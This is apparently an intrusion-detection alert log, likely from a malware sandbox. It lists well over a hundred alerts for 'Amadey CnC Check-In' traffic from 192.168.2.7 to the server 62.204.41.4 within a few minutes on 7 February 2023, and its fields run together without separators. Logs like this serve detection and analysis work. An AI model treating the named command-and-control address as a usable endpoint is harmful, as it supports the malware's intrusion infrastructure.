                                                                      192.168.2.762.204.41.450259802027700 02/07/23-23:09:34.780949TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450124802027700 02/07/23-23:08:57.344638TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450439802027700 02/07/23-23:10:20.713212TCP2027700ET TROJAN Amadey CnC Check-In5043980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449982802027700 02/07/23-23:08:20.169197TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449921802027700 02/07/23-23:08:02.784331TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449734802027700 02/07/23-23:07:11.313399TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450001802027700 02/07/23-23:08:24.834270TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450157802027700 02/07/23-23:09:05.447048TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450353802027700 02/07/23-23:09:57.891553TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449725802027700 02/07/23-23:07:09.061494TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449790802027700 02/07/23-23:07:26.361222TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450344802027700 02/07/23-23:09:55.700525TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450143802027700 02/07/23-23:09:02.035667TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449781802027700 02/07/23-23:07:24.188556TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450095802027700 02/07/23-23:08:49.744924TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449963802027700 02/07/23-23:08:13.161472TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450115802027700 02/07/23-23:08:55.052783TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450185802027700 02/07/23-23:09:14.360322TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449762802027700 02/07/23-23:07:17.827370TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450381802027700 02/07/23-23:10:04.673244TCP2027700ET TROJAN Amadey CnC Check-In5038180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450316802027700 02/07/23-23:09:48.784877TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450020802027700 02/07/23-23:08:29.489590TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449938802027700 02/07/23-23:08:06.973604TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450058802027700 02/07/23-23:08:40.571514TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450067802027700 02/07/23-23:08:42.809418TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449880802027700 02/07/23-23:07:49.880282TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449864802027700 02/07/23-23:07:45.902188TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450214802027700 02/07/23-23:09:21.511864TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449947802027700 02/07/23-23:08:09.176994TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450140802027700 02/07/23-23:09:01.270109TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450296802027700 02/07/23-23:09:43.846361TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450131802027700 02/07/23-23:08:59.066086TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450401802027700 02/07/23-23:10:09.526189TCP2027700ET TROJAN Amadey CnC Check-In5040180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450086802027700 02/07/23-23:08:47.567671TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449919802027700 02/07/23-23:08:02.303851TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450299802027700 02/07/23-23:09:44.598785TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450169802027700 02/07/23-23:09:10.009649TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449991802027700 02/07/23-23:08:22.396521TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450039802027700 02/07/23-23:08:34.413705TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450112802027700 02/07/23-23:08:54.333220TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449966802027700 02/07/23-23:08:13.888624TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449753802027700 02/07/23-23:07:15.610893TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449706802027700 02/07/23-23:07:04.472246TCP2027700ET TROJAN Amadey CnC Check-In4970680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449836802027700 02/07/23-23:07:38.152613TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450325802027700 02/07/23-23:09:51.040294TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450242802027700 02/07/23-23:09:30.589447TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450455802027700 02/07/23-23:10:24.593085TCP2027700ET TROJAN Amadey CnC Check-In5045580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450372802027700 02/07/23-23:10:02.525802TCP2027700ET TROJAN Amadey CnC Check-In5037280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449900802027700 02/07/23-23:07:54.774755TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450323802027700 02/07/23-23:09:50.536075TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449961802027700 02/07/23-23:08:12.685375TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450032802027700 02/07/23-23:08:32.408441TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450384802027700 02/07/23-23:10:05.420068TCP2027700ET TROJAN Amadey CnC Check-In5038480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449722802027700 02/07/23-23:07:08.360519TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449878802027700 02/07/23-23:07:49.349230TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450127802027700 02/07/23-23:08:58.089434TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449750802027700 02/07/23-23:07:14.882617TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449704802027700 02/07/23-23:07:03.968547TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450050802027700 02/07/23-23:08:38.652718TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449737802027700 02/07/23-23:07:12.033255TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450004802027700 02/07/23-23:08:25.569822TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450341802027700 02/07/23-23:09:54.975800TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450356802027700 02/07/23-23:09:58.629045TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449994802027700 02/07/23-23:08:23.133003TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450145802027700 02/07/23-23:09:02.533585TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449793802027700 02/07/23-23:07:27.063291TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449933802027700 02/07/23-23:08:05.759793TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450418802027700 02/07/23-23:10:13.656697TCP2027700ET TROJAN Amadey CnC Check-In5041880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449755802027700 02/07/23-23:07:16.092892TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450469802027700 02/07/23-23:10:28.062597TCP2027700ET TROJAN Amadey CnC Check-In5046980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450155802027700 02/07/23-23:09:04.977918TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449951802027700 02/07/23-23:08:10.180584TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450060802027700 02/07/23-23:08:41.073047TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449827802027700 02/07/23-23:07:35.253285TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450351802027700 02/07/23-23:09:57.406628TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449732802027700 02/07/23-23:07:10.829866TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450328802027700 02/07/23-23:09:51.766213TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450178802027700 02/07/23-23:09:12.666182TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450374802027700 02/07/23-23:10:02.999700TCP2027700ET TROJAN Amadey CnC Check-In5037480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449810802027700 02/07/23-23:07:31.110999TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450173802027700 02/07/23-23:09:11.479350TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449905802027700 02/07/23-23:07:57.664790TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450268802027700 02/07/23-23:09:36.981445TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449727802027700 02/07/23-23:07:09.536306TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449709802027700 02/07/23-23:07:05.205403TCP2027700ET TROJAN Amadey CnC Check-In4970980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450251802027700 02/07/23-23:09:32.760947TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450446802027700 02/07/23-23:10:22.408033TCP2027700ET TROJAN Amadey CnC Check-In5044680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450318802027700 02/07/23-23:09:49.262876TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450346802027700 02/07/23-23:09:56.168424TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449956802027700 02/07/23-23:08:11.390677TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449800802027700 02/07/23-23:07:28.753249TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450122802027700 02/07/23-23:08:56.823302TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450278802027700 02/07/23-23:09:39.423463TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450022802027700 02/07/23-23:08:30.007207TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450313802027700 02/07/23-23:09:48.033865TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450200802027700 02/07/23-23:09:18.098931TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449760802027700 02/07/23-23:07:17.283372TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449765802027700 02/07/23-23:07:19.352231TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449902802027700 02/07/23-23:07:55.670942TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449984802027700 02/07/23-23:08:20.651522TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450176802027700 02/07/23-23:09:12.185200TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449701802027700 02/07/23-23:07:03.267557TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450415802027700 02/07/23-23:10:12.934992TCP2027700ET TROJAN Amadey CnC Check-In5041580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450476802027700 02/07/23-23:10:29.753559TCP2027700ET TROJAN Amadey CnC Check-In5047680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450320802027700 02/07/23-23:09:49.746312TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449786802027700 02/07/23-23:07:25.415635TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450448802027700 02/07/23-23:10:22.892315TCP2027700ET TROJAN Amadey CnC Check-In5044880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450053802027700 02/07/23-23:08:39.384369TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449829802027700 02/07/23-23:07:35.738938TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450219802027700 02/07/23-23:09:22.722186TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450071802027700 02/07/23-23:08:43.808188TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449930802027700 02/07/23-23:08:05.022671TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450148802027700 02/07/23-23:09:03.260796TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450025802027700 02/07/23-23:08:30.727717TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450221802027700 02/07/23-23:09:23.231201TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449885802027700 02/07/23-23:07:51.097832TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450043802027700 02/07/23-23:08:36.948526TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449857802027700 02/07/23-23:07:44.177016TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449987802027700 02/07/23-23:08:21.404063TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450453802027700 02/07/23-23:10:24.103441TCP2027700ET TROJAN Amadey CnC Check-In5045380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450101802027700 02/07/23-23:08:51.475051TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449831802027700 02/07/23-23:07:36.211398TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449834802027700 02/07/23-23:07:37.138339TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450450802027700 02/07/23-23:10:23.361477TCP2027700ET TROJAN Amadey CnC Check-In5045080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450015802027700 02/07/23-23:08:28.258645TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449923802027700 02/07/23-23:08:03.274770TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450272802027700 02/07/23-23:09:37.970566TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450349802027700 02/07/23-23:09:56.920228TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450183802027700 02/07/23-23:09:13.886211TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449803802027700 02/07/23-23:07:29.455829TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450275802027700 02/07/23-23:09:38.709285TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449758802027700 02/07/23-23:07:16.813665TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450377802027700 02/07/23-23:10:03.701999TCP2027700ET TROJAN Amadey CnC Check-In5037780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449977802027700 02/07/23-23:08:18.914835TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450028802027700 02/07/23-23:08:31.449239TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450117802027700 02/07/23-23:08:55.559827TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450247802027700 02/07/23-23:09:31.810490TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450425802027700 02/07/23-23:10:15.374875TCP2027700ET TROJAN Amadey CnC Check-In5042580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449806802027700 02/07/23-23:07:30.176072TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449888802027700 02/07/23-23:07:51.818185TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449694802027700 02/07/23-23:07:00.567051TCP2027700ET TROJAN Amadey CnC Check-In4969480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449949802027700 02/07/23-23:08:09.663718TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450081802027700 02/07/23-23:08:46.318733TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449783802027700 02/07/23-23:07:24.676198TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450199802027700 02/07/23-23:09:17.854664TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450314802027700 02/07/23-23:09:48.299454TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449924802027700 02/07/23-23:08:03.524088TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450252802027700 02/07/23-23:09:32.997462TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450350802027700 02/07/23-23:09:57.159011TCP2027700ET TROJAN Amadey CnC Check-In5035080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449789802027700 02/07/23-23:07:26.125135TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449887802027700 02/07/23-23:07:51.576053TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450347802027700 02/07/23-23:09:56.442076TCP2027700ET TROJAN Amadey CnC Check-In5034780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450445802027700 02/07/23-23:10:22.165070TCP2027700ET TROJAN Amadey CnC Check-In5044580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449980802027700 02/07/23-23:08:19.678959TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450409802027700 02/07/23-23:10:11.502083TCP2027700ET TROJAN Amadey CnC Check-In5040980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450089802027700 02/07/23-23:08:48.291498TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450244802027700 02/07/23-23:09:31.095485TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449957802027700 02/07/23-23:08:11.632559TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449703802027700 02/07/23-23:07:03.736813TCP2027700ET TROJAN Amadey CnC Check-In4970380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450031802027700 02/07/23-23:08:32.148800TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449862802027700 02/07/23-23:07:45.411368TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450440802027700 02/07/23-23:10:20.951914TCP2027700ET TROJAN Amadey CnC Check-In5044080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449792802027700 02/07/23-23:07:26.828357TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450179802027700 02/07/23-23:09:12.913891TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450084802027700 02/07/23-23:08:47.056885TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450126802027700 02/07/23-23:08:57.855567TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449756802027700 02/07/23-23:07:16.330637TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449993802027700 02/07/23-23:08:22.893784TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450159802027700 02/07/23-23:09:05.933299TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450076802027700 02/07/23-23:08:45.054389TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450257802027700 02/07/23-23:09:34.266479TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450232802027700 02/07/23-23:09:25.965511TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450113802027700 02/07/23-23:08:54.584710TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450367802027700 02/07/23-23:10:01.324979TCP2027700ET TROJAN Amadey CnC Check-In5036780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450465802027700 02/07/23-23:10:27.020474TCP2027700ET TROJAN Amadey CnC Check-In5046580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450195802027700 02/07/23-23:09:16.860331TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449867802027700 02/07/23-23:07:46.640725TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449818802027700 02/07/23-23:07:33.042482TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450330802027700 02/07/23-23:09:52.266544TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449960802027700 02/07/23-23:08:12.428217TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450146802027700 02/07/23-23:09:02.779773TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450359802027700 02/07/23-23:09:59.354061TCP2027700ET TROJAN Amadey CnC Check-In5035980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449776802027700 02/07/23-23:07:23.001075TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450011802027700 02/07/23-23:08:27.300770TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450432802027700 02/07/23-23:10:18.991989TCP2027700ET TROJAN Amadey CnC Check-In5043280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449854802027700 02/07/23-23:07:43.442984TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450182802027700 02/07/23-23:09:13.649408TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450478802027700 02/07/23-23:10:30.234168TCP2027700ET TROJAN Amadey CnC Check-In5047880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449937802027700 02/07/23-23:08:06.728827TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450265802027700 02/07/23-23:09:36.236425TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449805802027700 02/07/23-23:07:29.940054TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449716802027700 02/07/23-23:07:06.915416TCP2027700ET TROJAN Amadey CnC Check-In4971680192.168.2.762.204.41.4
